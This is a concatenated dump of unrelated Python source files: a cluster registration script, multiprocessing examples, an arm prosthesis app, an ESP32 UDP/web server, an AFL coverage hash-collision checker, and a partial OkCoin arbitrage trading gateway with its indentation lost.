    print(f"registering host: {sync_obj.selfNode.id}")
    sync_obj.waitReady()
    print(f"bind complete: {sync_obj.selfNode.id}")

    # Announce this host in the replicated registry; retry until the lock
    # acquisition replicates.
    while not repl_hosts.tryAcquire(sync_obj.selfNode.id, data=host_resources, sync=True):
        print(f"connecting to cluster...")
        time.sleep(0.1)

    m = PushManager(address=host_to_address(manager_host), authkey=manager_auth_key)
    mgmt_server = m.get_server()
    mt = serve_forever(mgmt_server)

    if web_router is None:
        mt.join()
    else:
        webserver = tornado.httpserver.HTTPServer(web_router)
        print(f"starting webserver @ {web_port}")
        webserver.listen(web_port)
        # use asyncio to drive tornado so that async io can be used in web handlers
        loop = asyncio.get_event_loop()
        try:
            loop.run_forever()
        finally:
            loop.run_until_complete(loop.shutdown_asyncgens())
            loop.close()

    print(f"stopping")
if __name__ == "__main__":
    import sys
    # Requires the config file path as the first CLI argument.
    main(sys.argv[1])
|
multiprocessing_test.py | import multiprocessing
# from https://docs.python.org/2/library/multiprocessing.html
# NOTE: Python 2 syntax (print statements) — this file will not run under
# Python 3 without modification. `f` is deliberately redefined before each
# example; each __main__ block uses the most recent definition above it.

def f(x):
    # square — used by the Pool example below
    return x*x

if __name__ == '__main__':
    # Pool example: map f over a list with 5 worker processes.
    p = multiprocessing.Pool(5)
    print(p.map(f, [1, 2, 3]))

def f(name):
    # greeting — used by the Process example below
    print 'hello', name

if __name__ == '__main__':
    # Process example: run f('bob') in a child process.
    p = multiprocessing.Process(target=f, args=('bob',))
    p.start()
    p.join()
    print p.exitcode

def f(q):
    # queue producer — used by the Queue example below
    q.put([42, None, 'hello'])

if __name__ == '__main__':
    # Queue example: receive a message from the child process.
    q = multiprocessing.Queue()
    p = multiprocessing.Process(target=f, args=(q,))
    p.start()
    print q.get()  # prints "[42, None, 'hello']"
    p.join()
    print p.exitcode
    print "done"
|
app.py | # Press the green button in the gutter to run the script.
import os
import sys
import threading
import time
import logging
from arm_prosthesis.external_communication.core.communication import Communication
from arm_prosthesis.external_communication.services.telemetry_service import TelemetryService
from arm_prosthesis.hand_controller import HandController
from arm_prosthesis.config.configuration import load_config
from arm_prosthesis.services.mio_patterns_service import MioPatternsService
from arm_prosthesis.services.myoelectronics_service import MyoelectronicsService
from arm_prosthesis.services.gesture_repository import GestureRepository
from arm_prosthesis.services.motor_driver_communication import ActuatorControllerService
from arm_prosthesis.services.settings_dao import SettingsDao
class App:
    """Wires together the prosthesis services and runs their worker threads."""

    def __init__(self):
        # Load config first so logging can be configured from it.
        self._config = load_config('/home/pi/arm-prosthesis/arm_prosthesis/config/config.ini')
        self.init_logger()
        self._logger = logging.getLogger('Main')
        self._logger.info('Logger init. Start app.')
        self._logger.info(f'App settings:\n{self._config}')
        self._settings_dao = SettingsDao(self._config.settings_path)
        self._logger.info(f'Prosthesis settings:\n{self._settings_dao.get()}')
        self._driver_communication = ActuatorControllerService()
        self._hand = HandController(self._driver_communication)
        self._gesture_repository = GestureRepository(self._config.gestures_path)
        self._telemetry_service = TelemetryService(self._gesture_repository, self._driver_communication)
        self._myoelectronics_service = MyoelectronicsService(self._config.model_path)
        self._mio_patterns_service = MioPatternsService(self._config.patterns_path)
        # be sure to refactor, remove the god class
        self._communication = Communication(self._hand, self._config, self._gesture_repository, self._telemetry_service,
                                            self._settings_dao, self._myoelectronics_service,
                                            self._driver_communication,
                                            self._mio_patterns_service)
        self._driver_communication_thread = threading.Thread(target=self._driver_communication.run)
        self._communication_thread = threading.Thread(target=self._communication.run)
        self._hand_controller_thread = threading.Thread(target=self._hand.run)

    def run(self):
        """Start all worker threads and block until the hand controller exits."""
        self._logger.info('App start init workers.')
        self._driver_communication_thread.start()
        self._communication_thread.start()
        self._hand_controller_thread.start()
        if self._settings_dao.get().enable_emg:
            self._myoelectronics_service.start()
        self._logger.info('App started.')
        # The application's lifetime is tied to the hand controller thread.
        self._hand_controller_thread.join()
        self._logger.info('App closed.')

    def init_logger(self):
        """Configure root logging to stdout and, optionally, a session file."""
        session_name = time.strftime("%Y_%m_%d_%H_%M_%S")
        stdout_handler = logging.StreamHandler(sys.stdout)
        handlers = [stdout_handler]
        if self._config.log_to_file:
            # Race-free directory creation (was: `isdir(...) is False` + makedirs).
            os.makedirs(self._config.path_to_log, exist_ok=True)
            log_file = self._config.path_to_log + '/' + session_name + '.log'
            print("Log file is: " + log_file)
            file_handler = logging.FileHandler(filename=log_file)
            handlers.append(file_handler)
        logging.basicConfig(
            level=logging.INFO,
            format='%(asctime)s %(levelname)-8s [%(threadName)s] [%(filename)s:%(lineno)d] %(message)s',
            handlers=handlers
        )
if __name__ == '__main__':
    # Build the service graph and run until the hand controller stops.
    app = App()
    app.run()
|
main.py | #!/usr/bin/env python3
import sys
import click
import os
import time
import math
import traceback
import threading
import json
import socket
from datetime import datetime
from datetime import timedelta
from marie47esp32.webserver.webserver import WebServer
from marie47esp32.util.log import log
from marie47esp32.util.config import Config
from marie47esp32.udp.udpserver import UdpServer
import asyncio
import tornado.web
import tornado.websocket
from pickle import FALSE
def millis(start, end):
    """Return the elapsed time from `start` to `end` in milliseconds.

    Args:
        start: earlier datetime.
        end: later datetime.

    Returns:
        Elapsed milliseconds as a float (negative if `end` precedes `start`).
    """
    # timedelta.total_seconds() already folds days/seconds/microseconds
    # together; the previous hand-rolled arithmetic duplicated it.
    return (end - start).total_seconds() * 1000.0
ws = WebServer()
def start_tornado(port):
    """Run the global WebServer on its own asyncio event loop.

    Intended as a daemon-thread target: a fresh event loop is installed
    because Tornado runs here outside the main thread.
    """
    asyncio.set_event_loop(asyncio.new_event_loop())
    ws.run(port=port)
## TORNADO END
def main():
    """Start the web server on a daemon thread, then serve UDP packets forever.

    The UDP receive loop is the process's main loop; per-packet exceptions
    are logged and ignored, and the loop never exits normally.
    """
    log.debug('marie47esp32: starting...')

    # load config
    configpath="."
    config = Config.getSingleton()
    config.init(configpath)

    # Tornado runs on a daemon thread so it dies with the process.
    t = threading.Thread(target=start_tornado, args=[config.getInt("webserverport")])
    t.daemon = True
    t.start()

    UDP_PORT = config.getInt("udpserverport")
    UdpServer.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # UDP
    UdpServer.sock.bind(('', UDP_PORT))  # specify UDP_IP or INADDR_ANY

    while(True):
        try:
            udpdata, addr = UdpServer.sock.recvfrom(4096)  # buffer size is 4096 bytes
            UdpServer.handle_udp_paket(udpdata, addr)
        except Exception as e:
            log.warn('main: an exception occured! ignoring!')
            traceback.print_exc()
    # NOTE(review): unreachable — the loop above never breaks.
    log.debug('main: exiting.')
if __name__ == "__main__":
    # main() never returns normally, so the exit code is effectively unused.
    sys.exit(main())
|
check_hit_new.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
''' check hash conflict '''
import tempfile
from multiprocessing import Process
import os
import traceback
import sys
from utils import run_command_noret
MAP_SIZE_INDEX = 16
TRACE_EDGES = set()
class DynamicAnalyzer(object):
    """Collects QEMU translation-block traces for one test input via a FIFO.

    Python 2 module (print statements). Each run streams a QEMU trace
    through a temp-dir FIFO and folds the observed edges into the global
    TRACE_EDGES set.
    """

    def __init__(self):
        """ init """
        self._fifo_name = ''  # path of the FIFO QEMU writes its trace to
        self._tmpdir = ''     # temporary directory holding the FIFO

    def parse_trace(self):
        """Read the FIFO and add every (previous, current) basic-block pair
        to the global TRACE_EDGES set."""
        current = ''    # current basic block being parsed
        previous = '0'  # previous basic block being parsed
        edge_count = 0  # total edges seen (including repeats)
        uniq_count = 0  # edges seen for the first time
        with open(self._fifo_name, 'r') as fifo:
            for line in fifo:
                # NOTE(review): skips lines whose 7th character is '4' —
                # presumably a QEMU trace-record type filter; confirm against
                # the trace format.
                if line[6] == '4':
                    continue
                # process traced tbs
                current = line.split(':')[0]
                parse_edge = (previous, current)
                edge_count += 1
                if not parse_edge in TRACE_EDGES:
                    TRACE_EDGES.add(parse_edge)
                    uniq_count += 1
                previous = current

    def mkfifo(self, fifo=None):
        """Create a named pipe in a fresh temp directory for the QEMU trace."""
        if fifo is None:
            fifo = 'fifo'
        self._tmpdir = tempfile.mkdtemp()
        self._fifo_name = os.path.join(self._tmpdir, fifo)
        # print self._fifo_name
        try:
            os.mkfifo(self._fifo_name)
        except OSError as excp:
            # Clean up the temp dir before propagating the failure.
            traceback.print_exc()
            os.rmdir(self._tmpdir)
            print "Failed to create FIFO"
            print getattr(excp, 'message', repr(excp))
            raise excp

    def analyze_dynamic(self, test_input):
        """ analyze the dynamic translation block coverage with qemu """
        # Execute binary with qemu user mode while taking care of libraries
        # collect dynamic translation block execution information
        # 1. create a named pipe for qemu to write to
        self.mkfifo()
        # 2. build command and launch QEMU
        # cmd = self.build_qemu_cmd(test_input)
        cmdfile = open('command_file', 'r')
        run_cmd = cmdfile.readline()
        # The command template's placeholder order depends on whether it pipes.
        if '|' in run_cmd:
            cmd = run_cmd.format(test_input, self._fifo_name)
        else:
            cmd = run_cmd.format(self._fifo_name, test_input)
        print cmd
        # Run QEMU in a separate process (120 s timeout) so we can read the
        # FIFO from this one.
        process = Process(target=run_command_noret, args=[cmd, 120])
        process.start()
        # 3. read from fifo after QEMU finished executing
        try:
            self.parse_trace()
        except Exception as e:
            traceback.print_exc()
            print 'error when parsing qemu trace'
            print getattr(e, 'message', repr(e))
            raise e
        finally:
            # Always remove the FIFO and its temp dir, even on parse failure.
            os.remove(self._fifo_name)
            os.rmdir(self._tmpdir)
# ---- Script body (Python 2) ----------------------------------------------
# argv[1]: queue dir (or 'FILE' to reuse a saved edge_file)
# argv[2]: directory with the testcase(s) under examination
# argv[3]: start address used when recommending synthetic edges (Step 3)

edge_map = set()     # baseline edges from the fuzzer queue
full_map = dict()    # full-width AFL bitmap index -> list of edges
actual_map = dict()  # MAP_SIZE-truncated bitmap index -> list of edges
queue_dir = sys.argv[1]
#print queue_dir
start_address = sys.argv[3]

# load the queue data
if queue_dir == 'FILE':
    # Reuse edges saved by a previous run instead of re-tracing the queue.
    edge_map = set(tuple(line.strip().split(',')) for line in open('edge_file','r'))
    TRACE_EDGES.update(edge_map)
else:
    for root, dirs, files in os.walk(queue_dir):
        for f in files:
            full_path= '{}/{}'.format(root, f)
            analyzer = DynamicAnalyzer()
            analyzer.analyze_dynamic(full_path)
        edge_map.update(TRACE_EDGES)
        # no ".state" dir
        break

# save the edges into file
edge_file = open('edge_file', 'w')
for edge in edge_map:
    edge_file.write(edge[0]+','+edge[1]+'\n')
print len(edge_map)

# analyse the target testcase trace (adds its edges to TRACE_EDGES)
test_case_dir = sys.argv[2]
for root, dirs, files in os.walk(test_case_dir):
    for f in files:
        full_path= '{}/{}'.format(root, f)
        analyzer = DynamicAnalyzer()
        analyzer.analyze_dynamic(full_path)

# Step1: is there any new edge?
print "> Step1: is there any new edge?"
new_edges = TRACE_EDGES - edge_map
num_new_edges = len(new_edges)
if num_new_edges == 0:
    print "no new edges"
# NOTE(review): the "Yes!" line prints even when num_new_edges == 0 —
# looks like a missing else/exit; confirm intended behavior.
print "Yes! {} new edges found.".format(num_new_edges)
for edge in sorted(new_edges):
    print edge
print

# Step2: is the bitmap value causing conflicts?
# Hash each baseline edge with AFL's (cur, prev) mixing and look for
# new edges whose full-width hash collides with an existing one.
print "> Step2: is the bitmap value causing conflicts?"
same_hit = 1
for edge in edge_map:
    prev = int(edge[0], 16)
    cur = int(edge[1], 16)
    value = ((cur >> 4)^(cur << 8)) ^ (((prev >> 4)^(prev << 8)) >> 1)
    if value in full_map:
        full_map[value].append(edge)
    else:
        full_map[value] = [edge,]
for edge in new_edges:
    print edge
    print '......',
    prev = int(edge[0], 16)
    cur = int(edge[1], 16)
    value = ((cur >> 4)^(cur << 8)) ^ (((prev >> 4)^(prev << 8)) >> 1)
    print hex(value)
    if value in full_map:
        print "Confilct found: ", hex(value), full_map[value]
    else:
        print "No conflict"
        same_hit = 0
print "---------------------------------------------------------------------------------------------------------------"
if same_hit:
    print "All the new edges caused location conflicts in bitmap, it is hard to sync this testcase."
else:
    print "Looks good, continue..."
print

# Step3: is the bitmap value causing conflicts?
# Same check but with the hash truncated to the actual bitmap size; also
# searches (by linear probing from start_address) for a synthetic edge
# that would land on the same bitmap index.
print "> Step3: is the actual bitmap causing conflicts? [MAP_SIZE: 2**{}]".format(MAP_SIZE_INDEX)
MAP_SIZE = 2**MAP_SIZE_INDEX
should_in = 0
for edge in edge_map:
    prev = int(edge[0], 16)
    cur = int(edge[1], 16)
    value = ((cur >> 4)^(cur << 8))
    value &= (MAP_SIZE - 1)
    value ^= ((((prev >> 4)^(prev << 8)) & (MAP_SIZE - 1)) >> 1)
    if value in actual_map:
        actual_map[value].append(edge)
    else:
        actual_map[value] = [edge,]
start_fill = int(start_address, 16)
my_edges = {}      # recommended synthetic edges: fill_prev -> fill_cur
my_edge_end = []   # chain of synthetic block addresses, seeded with start
my_edge_end.append(start_fill)
for edge in sorted(new_edges):
    print edge
    print '......',
    prev = int(edge[0], 16)
    cur = int(edge[1], 16)
    value = ((cur >> 4)^(cur << 8))
    value &= (MAP_SIZE - 1)
    value ^= ((((prev >> 4)^(prev << 8)) & (MAP_SIZE - 1)) >> 1)
    print hex(value)
    edge_found = 0
    fill_prev = my_edge_end[-1]
    fill_cur_start = my_edge_end[0] + 10
    print hex(fill_prev), hex(fill_cur_start)
    # Probe successive target addresses until one hashes to the same index.
    while edge_found != 1:
        fill_value = ((fill_cur_start >> 4)^(fill_cur_start << 8))
        fill_value &= (MAP_SIZE - 1)
        fill_value ^= ((((fill_prev >> 4)^(fill_prev << 8)) & (MAP_SIZE - 1)) >> 1)
        if fill_value == value:
            print "Recommend edge: [{}, {}], index value is {}".format(hex(fill_prev), hex(fill_cur_start), hex(fill_value))
            my_edges[fill_prev] = fill_cur_start
            my_edge_end.append(fill_cur_start)
            edge_found = 1
            break
        fill_cur_start += 1
    if value in actual_map:
        print "Confilct found in location {}: existing edges:{}".format(hex(value), actual_map[value])
    else:
        print "No conflict"
        should_in = 1
print "---------------------------------------------------------------------------------------------------------------"
if should_in:
    print "The testcase looks very interesting!"
else:
    print "All the new edges caused conflicts, please try changing the `MAP_SIZE` in afl"
|
okcoinGateway.py | # encoding: UTF-8
'''
vn.okcoin的gateway接入
注意:
1. 前仅支持USD和CNY的现货交易,USD的期货合约交易暂不支持
'''
import os
import json
import logging
from datetime import datetime
from time import sleep
from copy import copy, deepcopy
from threading import Condition
from Queue import Queue
from threading import Thread
from time import sleep
from operator import itemgetter
from itertools import *
from okcoin.vnokcoin import OkCoinApi,OKCOIN_USD
from vtGateway import *
from vtFunction import getJsonPath
# Price type mapping: OkCoin order-type string -> (direction, price type)
priceTypeMap = {}
priceTypeMap['buy'] = (DIRECTION_LONG, PRICETYPE_LIMITPRICE)
priceTypeMap['buy_market'] = (DIRECTION_LONG, PRICETYPE_MARKETPRICE)
priceTypeMap['sell'] = (DIRECTION_SHORT, PRICETYPE_LIMITPRICE)
priceTypeMap['sell_market'] = (DIRECTION_SHORT, PRICETYPE_MARKETPRICE)
priceTypeMapReverse = {v: k for k, v in priceTypeMap.items()}
# Direction mapping (left empty here; kept for symmetry with other gateways)
directionMap = {}
directionMapReverse = {v: k for k, v in directionMap.items()}
# Order status mapping: OkCoin numeric status code -> vn.py status constant
statusMap = {}
statusMap[-1] = STATUS_CANCELLED
statusMap[0] = STATUS_NOTTRADED
statusMap[1] = STATUS_PARTTRADED
statusMap[2] = STATUS_ALLTRADED
statusMap[4] = STATUS_UNKNOWN
############################################
## Tradable spot contract codes
############################################
SYMBOL = ['ace', 'act', 'amm', 'ark', 'ast', 'avt', 'bnt', 'btm', 'cmt', 'ctr',
          'cvc', 'dash', 'dat', 'dgb', 'dgd', 'dnt', 'dpy', 'edo', 'elf', 'eng',
          'eos', 'etc', 'evx', 'fun', 'gas', 'gnt', 'gnx', 'hsr', 'icn', 'icx',
          'iota', 'itc', 'kcash', 'knc', 'link', 'lrc', 'ltc', 'mana', 'mco',
          'mda', 'mdt', 'mth', 'nas', 'neo', 'nuls', 'oax', 'omg', 'pay',
          'ppt', 'pro', 'qtum', 'qvt', 'rcn', 'rdn', 'read', 'req', 'rnt', 'salt',
          'san', 'sngls', 'snm', 'snt', 'ssc', 'storj', 'sub', 'swftc',
          'tnb', 'trx', 'ugc', 'ukg', 'vee', 'wrc', 'wtc', 'xem', 'xlm', 'xmr',
          'xrp', 'xuc', 'yoyo', 'zec', 'zrx', '1st']
############################################
# logging.basicConfig(level=logging.DEBUG,
# format='%(asctime)s %(levelname)s %(message)s',
# datefmt='%a, %d %b %Y %H:%M:%S',
# filename='/root/vn.okex/vnpy/trader/gateway/okcoinGateway/log',
# filemode='a')
########################################################################
class OkcoinGateway(VtGateway):
"""OkCoin接口"""
#----------------------------------------------------------------------
def __init__(self, eventEngine, coins, gatewayName='OKCOIN'):
"""Constructor"""
super(OkcoinGateway, self).__init__(eventEngine, gatewayName)
self.coins = coins
self.api = Api(self)
self.leverage = 0
self.connected = False
self.qryEnabled = False
self.fileName = self.gatewayName + '_connect.json'
self.filePath = getJsonPath(self.fileName, __file__)
self.registeHandle()
self.tradeSymbols = []
self.tradeTest = True
self.coin2tradeSymbols()
#----------------------------------------------------------------------
def connect(self):
"""连接"""
# 载入json文件
try:
f = file(self.filePath)
except IOError:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'读取连接配置出错,请检查'
self.onLog(log)
return
# 解析json文件
setting = json.load(f)
try:
host = str(setting['host'])
apiKey = str(setting['apiKey'])
secretKey = str(setting['secretKey'])
trace = setting['trace']
leverage = setting['leverage']
except KeyError:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'连接配置缺少字段,请检查'
self.onLog(log)
return
# 初始化接口
self.leverage = leverage
# if host == 'CNY':
# host = vnokcoin.OKCOIN_CNY
# else:
# host = vnokcoin.OKCOIN_USD
host = OKCOIN_USD
self.api.active = True
self.api.connect(host, apiKey, secretKey, trace)
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'接口初始化成功'
self.onLog(log)
# 启动查询
self.initQuery()
self.startQuery()
#----------------------------------------------------------------------
def coin2tradeSymbols(self):
"""币种转换成合约代码"""
c = ['btc', self.coins, 'eth']
self.tradeSymbols = ['_'.join((c[1], c[0])),
'_'.join((c[1], c[2])),
'eth_btc']
#----------------------------------------------------------------------
def login(self):
"""订阅订单回报"""
return self.api.login()
#----------------------------------------------------------------------
def subscribe(self):
"""订阅行情"""
for coin in SYMBOL[:10]:
bs = coin + '_btc'
es = coin + '_eth'
self.api.subscribeSpotDepth(bs, '5')
self.api.subscribeSpotDepth(es, '5')
#----------------------------------------------------------------------
def sendOrder(self, orderReq):
"""发单"""
return self.api.spotSendOrder(orderReq)
#----------------------------------------------------------------------
def cancelOrder(self, cancelOrderReq):
"""撤单"""
self.api.spotCancel(cancelOrderReq)
#----------------------------------------------------------------------
def qryAccount(self):
"""查询账户资金"""
self.api.spotUserInfo()
#----------------------------------------------------------------------
def qryPosition(self):
"""查询持仓"""
pass
#----------------------------------------------------------------------
def close(self):
"""关闭"""
self.api.active = False
self.api.close()
#----------------------------------------------------------------------
def initQuery(self):
"""初始化连续查询"""
if self.qryEnabled:
# 需要循环的查询函数列表
self.qryFunctionList = [self.qryAccount]
# self.qryFunctionList = [self.tradePolicy]
self.qryCount = 0 # 查询触发倒计时
self.qryTrigger = 2 # 查询触发点
self.qryNextFunction = 0 # 上次运行的查询函数索引
self.startQuery()
#----------------------------------------------------------------------
def query(self, event):
"""注册到事件处理引擎上的查询函数"""
self.qryCount += 1
if self.qryCount > self.qryTrigger:
# 清空倒计时
self.qryCount = 0
# 执行查询函数
function = self.qryFunctionList[self.qryNextFunction]
function()
# 计算下次查询函数的索引,如果超过了列表长度,则重新设为0
self.qryNextFunction += 1
if self.qryNextFunction == len(self.qryFunctionList):
self.qryNextFunction = 0
#----------------------------------------------------------------------
def startQuery(self):
"""启动连续查询"""
self.eventEngine.register(EVENT_TIMER, self.query)
#----------------------------------------------------------------------
def setQryEnabled(self, qryEnabled):
"""设置是否要启动循环查询"""
self.qryEnabled = qryEnabled
# ----------------------------------------------------------------------
def pTick(self, event):
tick = event.dict_['data']
self.tradePolicy()
# if tick.symbol == 'mco_btc':
# print '========tick============='
# print tick.symbol
# print tick.askPrice1
# print tick.askVolume1
# print tick.bidPrice1
# print tick.bidVolume1
# if self.tradeTest:
# req = VtOrderReq()
# req.symbol = tick.symbol
# req.priceType = 'sell'
# req.price = tick.bidPrice1
# req.volume = 0.09
# self.sendOrder(req)
# print 'send order!'
# self.tradeTest = False
# ----------------------------------------------------------------------
def pAccount(self, event):
account = event.dict_['data']
# print '=======account========'
# print self.api.account
# ----------------------------------------------------------------------
def pOrder(self, event):
order = event.dict_['data']
# print '=======order========'
# print order.symbol
# print order.orderID
# print order.status
# ----------------------------------------------------------------------
def pBalance(self, event):
balance = event.dict_['data']
# print '=======balance========'
# print self.api.account
# ----------------------------------------------------------------------
def pLog(self, event):
log = event.dict_['data']
loginfo = ':'.join([log.logTime, log.logContent])
# send_msg(loginfo)
self.today = datetime.now().date().strftime('%Y-%m-%d')
filename = config.basePath + 'myctp/vn.trader/ctpGateway/log/%s' % ('tradeLog' + '-' + self.today + '.txt')
if os.path.exists(filename):
fp = file(filename, 'a+')
try:
fp.write(loginfo.encode('utf-8') + '\n')
finally:
fp.close()
else:
fp = file(filename, 'wb')
try:
fp.write(loginfo.encode('utf-8') + '\n')
finally:
fp.close()
# ----------------------------------------------------------------------
def prepare(self, symbols):
'''获取盈利空间和转换后的btc交易量'''
# print 'in prepare'
# print self.api.depth
# depth = deepcopy(self.api.depth)
depth = self.api.depth
for s in symbols:
if s not in depth.keys():
return depth, 0, 0
profit = (float(depth[symbols[1]].bidPrice1) * float(depth[symbols[2]].bidPrice1)) / \
float(depth[symbols[0]].askPrice1)
if profit > 1.02: #设置最小盈利空间为1.5%
amount = []
amount.append(float(depth[symbols[0]].askPrice1) * min(float(depth[symbols[0]].askVolume1),
float(depth[symbols[1]].bidVolume1)))
amount.append(float(depth[symbols[2]].bidPrice1) * float(depth[symbols[2]].bidVolume1))
amount.sort()
return depth, profit, amount[0]
else:
return depth, 0, 0
# ----------------------------------------------------------------------
def getAmount(self):
'''获取盈利最大的合约组合,并计算每个合约的交易量'''
depth, profit, amount = self.prepare(self.tradeSymbols)
if amount > 0.002: #设置最小btc交易量为0.002
tradeSymbol = {}
tradeSymbol['symbol'] = self.tradeSymbols
tradeSymbol['profit'] = profit
tradeSymbol['amount'] = amount
tradeSymbol['total'] = profit * amount
self.api.writeLog('=======in getAmount=======')
self.api.writeLog('symbol: %s'% tradeSymbol['symbol'])
print 'profit:', tradeSymbol['profit']
print 'amount:', tradeSymbol['amount']
print 'depth1:', depth[tradeSymbol['symbol'][0]].askPrice1, depth[tradeSymbol['symbol'][0]].askVolume1
print 'depth2:', depth[tradeSymbol['symbol'][1]].bidPrice1, depth[tradeSymbol['symbol'][1]].bidVolume1
print 'depth3:', depth[tradeSymbol['symbol'][2]].bidPrice1, depth[tradeSymbol['symbol'][2]].bidVolume1
if self.api.account['free']['btc'] <= tradeSymbol['amount']:
initAmount = self.api.account['free']['btc']
else:
initAmount = tradeSymbol['amount']
amountDict = {}
amountDict[tradeSymbol['symbol'][0]] = round(initAmount * 0.998 / float(depth[tradeSymbol['symbol'][0]].askPrice1), 8)
amountDict[tradeSymbol['symbol'][1]] = round(amountDict[tradeSymbol['symbol'][0]] * 0.99898, 8)
amountDict[tradeSymbol['symbol'][2]] = round(((amountDict[tradeSymbol['symbol'][1]]*\
float(depth[tradeSymbol['symbol'][1]].bidPrice1) * 0.9989)), 8)
return depth, tradeSymbol['symbol'], amountDict
else:
return depth, [], {}
# ----------------------------------------------------------------------
def tradePolicy_maket(self):
tradeList = []
depth, symbols, amount = self.getAmount()
if symbols == []:
return False
self.api.writeLog('[Start Polocy]')
# if True:
# return
for i in range(20):
if symbols[0] not in tradeList and self.api.account['free']['btc'] >= amount[symbols[0]] * float(depth[symbols[0]].askPrice1):
# print 'step1'
req = VtOrderReq()
req.symbol = symbols[0]
req.priceType = 'buy_market'
# print 'step2'
req.price = round(float(depth[symbols[0]].askPrice1) * amount[symbols[0]] * 0.999, 8)
# print 'step3'
req.volume = ''
# print 'step4'
self.sendOrder(req)
tradeList.append(symbols[0])
if symbols[1] not in tradeList and self.api.account['free'][symbols[1].split('_')[0]] >= amount[symbols[1]] * 0.8:
req = VtOrderReq()
req.symbol = symbols[1]
req.priceType = 'sell_market'
req.price = ''
req.volume = self.api.account['free'][symbols[1].split('_')[0]] * 0.999
self.sendOrder(req)
tradeList.append(symbols[1])
if symbols[2] not in tradeList and self.api.account['free']['eth'] >= amount[symbols[2]] * 0.8:
req = VtOrderReq()
req.symbol = symbols[2]
req.priceType = 'sell_market'
req.price = ''
req.volume = self.api.account['free']['eth'] * 0.999
self.sendOrder(req)
tradeList.append(symbols[2])
if len(tradeList) >= 3 and len(self.api.orderDict) == 0:
self.api.writeLog('[End Policy]succssed complete all trade!')
return
sleep(0.5)
orders = deepcopy(self.api.orderDict)
for id in orders.keys():
req = VtCancelOrderReq
req.symbol = orders[id].symbol
req.orderID = orders[id].orderID
self.cancelOrder(req)
self.api.orderDict.pop(id)
self.api.writeLog('[End Policy]Failed complete all trade!')
# ----------------------------------------------------------------------
def tradePolicy(self):
tradeList = []
depth, symbols, amount = self.getAmount()
if symbols == []:
return False
self.api.writeLog('[Start Polocy]')
# if True:
# return
for i in range(60):
if symbols[0] not in tradeList and self.api.account['free']['btc'] >= amount[symbols[0]] * float(depth[symbols[0]].askPrice1):
# print 'step1'
req = VtOrderReq()
req.symbol = symbols[0]
req.priceType = 'buy'
# print 'step2'
req.price = depth[symbols[0]].askPrice1
# print 'step3'
req.volume = amount[symbols[0]]
# print 'step4'
self.sendOrder(req)
tradeList.append(symbols[0])
if symbols[1] not in tradeList and self.api.account['free'][symbols[1].split('_')[0]] >= amount[symbols[1]] * 0.9:
req = VtOrderReq()
req.symbol = symbols[1]
req.priceType = 'sell'
req.price = depth[symbols[1]].bidPrice1
req.volume = round(self.api.account['free'][symbols[1].split('_')[0]] * 0.9999, 8)
self.sendOrder(req)
tradeList.append(symbols[1])
if symbols[2] not in tradeList and self.api.account['free']['eth'] >= amount[symbols[2]] * 0.9:
req = VtOrderReq()
req.symbol = symbols[2]
req.priceType = 'sell'
req.price = depth[symbols[2]].bidPrice1
req.volume = round(self.api.account['free']['eth'] * 0.9999, 8)
self.sendOrder(req)
tradeList.append(symbols[2])
if len(tradeList) >= 3 and len(self.api.orderDict) == 0:
self.api.writeLog('[End Policy]succssed complete all trade!')
return
sleep(0.5)
orders = deepcopy(self.api.orderDict)
for id in orders.keys():
req = VtCancelOrderReq
req.symbol = orders[id].symbol
req.orderID = orders[id].orderID
self.cancelOrder(req)
self.api.orderDict.pop(id)
sleep(0.5)
req = VtOrderReq()
req.symbol = symbols[1]
req.priceType = 'sell_market'
req.price = ''
req.volume = round(self.api.account['free'][symbols[1].split('_')[0]] * 0.9999, 8)
self.sendOrder(req)
req = VtOrderReq()
req.symbol = symbols[2]
req.priceType = 'sell_market'
req.price = ''
req.volume = self.api.account['free']['eth']
self.sendOrder(req)
self.api.writeLog('[End Policy]Failed complete all trade!')
# ----------------------------------------------------------------------
def registeHandle(self):
'''注册处理机'''
self.eventEngine.register(EVENT_TICK, self.pTick)
self.eventEngine.register(EVENT_ACCOUNT, self.pAccount)
self.eventEngine.register(EVENT_ORDER, self.pOrder)
self.eventEngine.register(EVENT_POSITION, self.pBalance)
########################################################################
class Api(OkCoinApi):
"""OkCoin的API实现"""
#----------------------------------------------------------------------
def __init__(self, gateway):
"""Constructor"""
super(Api, self).__init__()
self.gateway = gateway # gateway对象
self.gatewayName = gateway.gatewayName # gateway对象名称
self.active = True # 若为True则会在断线后自动重连
self.cbDict = {}
self.tickDict = {}
self.orderDict = {}
self.account = {}
self.account['free'] = {}
self.account['freezed'] = {}
self.balance = {}
self.depth = {}
self.tickCount = 0
self.localNo = 0 # 本地委托号
self.localNoQueue = Queue() # 未收到系统委托号的本地委托号队列
self.localNoDict = {} # key为本地委托号,value为系统委托号
self.orderIdDict = {} # key为系统委托号,value为本地委托号
self.cancelDict = {} # key为本地委托号,value为撤单请求
#----------------------------------------------------------------------
def onMessage(self, ws, evt):
"""信息推送"""
data = self.readData(evt)[0]
# print data
channel = data['channel']
callback = self.getCallback(channel)
callback(data)
#----------------------------------------------------------------------
def onError(self, ws, evt):
"""错误推送"""
error = VtErrorData()
error.gatewayName = self.gatewayName
error.errorMsg = str(evt)
self.gateway.onError(error)
#----------------------------------------------------------------------
def onClose(self, ws):
"""接口断开"""
# 如果尚未连上,则忽略该次断开提示
if not self.gateway.connected:
return
self.gateway.connected = False
self.writeLog(u'服务器连接断开')
# 重新连接
if self.active:
def reconnect():
while not self.gateway.connected:
self.writeLog(u'等待10秒后重新连接')
sleep(5)
if not self.gateway.connected:
self.reconnect()
t = Thread(target=reconnect)
t.start()
#----------------------------------------------------------------------
def onOpen(self, ws):
"""连接成功"""
self.gateway.connected = True
self.writeLog(u'服务器连接成功')
# 连接后查询账户和委托数据
self.writeLog(u'登陆')
self.login()
self.writeLog(u'查询账户信息')
self.spotUserInfo()
#
# self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_LTC, '-1')
# self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_BTC, '-1')
# self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_ETH, '-1')
# 连接后订阅现货的成交和账户数据
# self.subscribeSpotTrades('mco_btc')
# self.subscribeSpotUserInfo()
#
# self.subscribeSpotTicker(vnokcoin.SYMBOL_BTC)
# self.subscribeSpotTicker(vnokcoin.SYMBOL_LTC)
